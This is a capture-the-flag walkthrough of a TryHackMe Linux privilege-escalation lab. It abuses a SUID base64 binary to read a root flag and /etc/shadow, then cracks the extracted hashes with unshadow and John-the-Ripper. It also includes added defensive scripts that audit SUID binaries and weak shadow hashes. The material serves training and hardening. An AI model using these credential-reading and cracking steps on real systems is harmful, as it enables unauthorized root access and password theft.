This walkthrough will go over the Linux Privilege Escalation Capstone found on TryHackMe. The objective is to assess your understanding gained from the prior course content by placing you in an internal environment where you already possess low-level privileges on a Linux server. Your task is to identify an attack vector that enables you to escalate your privileges to root.
Ready, set, go!
First, we want to check and see if there is a cron job that we can exploit.
cat /etc/crontab
There's nothing for us here. Let's proceed to see which binaries have the SUID bit set, since those run with the privileges of their owner (root) rather than ours.
find / -type f -perm -04000 -ls 2>/dev/null
The base64 binary shows up with the SUID bit set, which it should not have. Because it runs as root, it can read any file on the system, and we can use it to obtain the root flag.
LFILE=/home/rootflag/flag2.txt
base64 "$LFILE" | base64 --decode
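The same find command the walkthrough uses is what a defender should be running on a schedule: the setuid bit on base64 is only dangerous because nobody noticed it. The script below is an added example, not part of the TryHackMe room or the original post. It audits a list of SUID paths against an allowlist; the allowlist contents and the sample input are assumptions chosen to show the check, so adjust the list to your distribution's real baseline.

```shell
#!/bin/sh
# Added example: flag SUID binaries that are not on an approved baseline.
# SUID_ALLOWLIST is an assumed baseline for illustration; build yours from a
# clean install of the same distribution and keep it under version control.
SUID_ALLOWLIST="/usr/bin/passwd
/usr/bin/sudo
/usr/bin/su
/usr/bin/mount
/usr/bin/umount
/usr/bin/chsh
/usr/bin/chfn
/usr/bin/newgrp
/usr/bin/gpasswd"

# Read one path per line from stdin and print every path that is not on the
# allowlist. Exact-line matching (grep -Fx) so /usr/bin/su does not cover
# /usr/bin/sudo or vice versa. Returns 1 when anything unexpected was seen.
unexpected_suid() {
    found=0
    while IFS= read -r path; do
        [ -z "$path" ] && continue
        if ! printf '%s\n' "$SUID_ALLOWLIST" | grep -Fxq -- "$path"; then
            printf '%s\n' "$path"
            found=1
        fi
    done
    return $found
}

# Live-host version: same find as in the walkthrough, piped into the audit.
# Remediation for a hit such as /usr/bin/base64 is simply: chmod u-s <path>
audit_host_suid() {
    find / -type f -perm -04000 2>/dev/null | unexpected_suid
}

# Constructed sample input standing in for the output of find on the room's
# host; /usr/bin/base64 is the entry this room turns on.
SAMPLE_SUID_LIST="/usr/bin/passwd
/usr/bin/sudo
/usr/bin/base64
/usr/bin/mount"

# Run the audit on the constructed sample when executed directly.
if [ "${0##*/}" = "suid_audit.sh" ]; then
    printf '%s\n' "$SAMPLE_SUID_LIST" | unexpected_suid
fi
```

Run `audit_host_suid` from cron or a configuration-management check and alert on a non-zero exit; the printed paths are the binaries to investigate and, if unjustified, strip with chmod u-s.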
Well, that worked for obtaining the root flag! Acquiring flag1 was a bit more challenging and required the use of unshadow. This command merges the passwd and shadow files into a single file, which can then be fed to John-the-Ripper to crack passwords.
LFILE=/etc/shadow
base64 "$LFILE" | base64 --decode
Copy and save the content into a shadow.txt file.
Grab the contents from passwd.
cat /etc/passwd
Copy and save the content into a passwd.txt file.
Combine the files and use John-the-Ripper to crack the passwords:
unshadow passwd.txt shadow.txt > passwords.txt
john --wordlist=/usr/share/wordlists/rockyou.txt passwords.txt
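The cracking step above succeeds because a password hash, once exposed, is only as strong as its scheme and the password behind it. The script below is an added example, not from the room or the original post: it scans shadow-format lines and reports accounts whose hashes would be cheap to attack (empty passwords, legacy DES-crypt, MD5-crypt). The sample lines are constructed and the hash bodies are placeholders, not real hashes; which schemes count as acceptable is an assumption you should match to your own policy.

```shell
#!/bin/sh
# Added example: report shadow entries with empty or weak password hashes.
# Field 2 of a shadow line is the hash; its "$id$" prefix names the scheme.

# Read shadow lines from stdin and print "user:reason" for each weak entry.
# Locked ("!" / "*") accounts are skipped. Returns 1 if anything was flagged.
weak_shadow_entries() {
    weak=0
    while IFS= read -r line; do
        [ -z "$line" ] && continue
        user=${line%%:*}
        rest=${line#*:}
        hash=${rest%%:*}
        case "$hash" in
            '')                    reason="empty password" ;;
            '!'*|'*'*)             continue ;;   # locked or login-disabled
            '$6$'*|'$5$'*|'$y$'*)  continue ;;   # SHA-512, SHA-256, yescrypt: acceptable (assumed policy)
            '$1$'*)                reason="MD5-crypt" ;;
            '$'*)                  reason="unrecognised scheme" ;;
            *)                     reason="legacy DES-crypt" ;;
        esac
        printf '%s:%s\n' "$user" "$reason"
        weak=1
    done
    return $weak
}

# Live-host version; must run as root or a member of the shadow group,
# which is exactly the boundary the SUID base64 in this room bypassed.
audit_host_shadow() {
    weak_shadow_entries < /etc/shadow
}

# Constructed sample: placeholder hashes in the shape of real shadow lines.
SAMPLE_SHADOW='root:$6$saltsalt$PLACEHOLDERHASH:19000:0:99999:7:::
missy:$1$abcdefgh$PLACEHOLDERHASH:19000:0:99999:7:::
guest::19000:0:99999:7:::
svc:*:19000:0:99999:7:::
legacy:AbCdEfGhIjKlM:19000:0:99999:7:::'

if [ "${0##*/}" = "shadow_audit.sh" ]; then
    printf '%s\n' "$SAMPLE_SHADOW" | weak_shadow_entries
fi
```

A clean result from this check does not make a password safe against a wordlist like rockyou.txt; it only removes the cases where cracking is nearly free. Enforcing password quality at set time and keeping /etc/shadow unreadable (mode 640, root:shadow) are what stop the attack chain shown in this room.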
Now that we have obtained missy's account password, we can switch users and retrieve the final flag from her Documents folder:
/home/missy/documents
Summary
In this walkthrough, we explore the Linux Privilege Escalation Capstone on TryHackMe, aiming to escalate our privileges to root. We begin by checking for exploitable cron jobs and identifying binaries with the SUID bit set. We exploit the SUID base64 binary to obtain the root flag and to read /etc/shadow, then use unshadow and John-the-Ripper to crack passwords and retrieve the final flag from missy's Documents folder.